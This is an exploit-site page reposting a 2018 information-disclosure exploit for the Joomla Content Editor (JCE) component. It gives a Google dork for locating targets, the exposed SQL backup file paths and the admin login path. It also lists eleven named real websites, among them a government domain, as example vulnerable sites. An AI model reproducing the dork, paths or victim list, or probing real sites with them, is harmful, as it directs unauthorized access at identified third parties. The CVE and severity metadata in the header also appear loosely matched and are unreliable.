Advertisement






Joomla Content Editor Com_JCE Components 2.5.24 Database Backup Disclosure

CVE Category Price Severity
CVE-2013-7285 CWE-264 Not specified High
Author Risk Exploitation Type Date
Unknown High Remote 2018-12-01
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/S:U/C:H/I:H/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018120001

Below is a copy:

Joomla Content Editor Com_JCE Components 2.5.24 Database Backup Disclosure
#################################################################################################

# Exploit Title : Joomla Content Editor Com_JCE Components 2.5.24 Database Backup Disclosure Information Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 30/11/2018
# Vendor Homepage : joomlacontenteditor.net
# Software Download Links : joomlacontenteditor.net/downloads/
+ github.com/joomla/volunteers.joomla.org/tree/master/www/administrator/components/com_jce/sql
+ gitlab.dev.playkey.net/realzkh/realzkh_legacy/tree/master/administrator/components/com_jce/sql
+ JCE 2.6.33 => joomlacontenteditor.net/downloads/editor/core?task=callelement&format=raw&item_id=1353&element=
f85c494b-2b32-4109-b8c1-083cca2b7db6&method=download&args[0]=9ee3309d5768681d0360490d647c2266
+ JCE 2.5.24 => joomlacontenteditor.net/news/jce-2524-released
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 2.6.33 ~ 2.5.24
# Google Dorks : inurl:''/index.php?option=com_jce''
Index of /administrator/components/com_jce/sql/
# Exploit Risk : Medium
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]  
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]

#################################################################################################

# Admin Panel Login Path : 

/administrator/

# Exploit : 

/administrator/components/com_jce/sql/mysql.sql

/administrator/components/com_jce/sql/postgresql.sql

/administrator/components/com_jce/sql/sqlsrv.sql

#################################################################################################

# Example Vulnerable Sites =>

[+] volunteers.joomla.org/www/administrator/components/com_jce/sql/mysql.sql

[+] freightdb.kzntransport.gov.za/administrator/components/com_jce/sql/mysql.sql

[+] murraynebraska.com/nl/administrator/components/com_jce/sql/mysql.sql

[+] rkbell.ca/joomla30/administrator/components/com_jce/sql/mysql.sql

[+] vir.nw.ru/test/vir.nw/administrator/components/com_jce/sql/mysql.sql

[+] weepingwaternebraska.com/nl/administrator/components/com_jce/sql/mysql.sql

[+] fotozrak.mk/print/administrator/components/com_jce/sql/mysql.sql

[+] colegioconcepciondeparral.cl/ccparral/administrator/components/com_jce/sql/mysql.sql

[+] elmwoodnebraska.com/nl/administrator/components/com_jce/sql/mysql.sql

[+] nowagalicja.itl.pl/files/jce/administrator/components/com_jce/sql/sqlsrv.sql

[+] aeroglobal.org/ios/administrator/components/com_jce/sql/mysql.sql

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.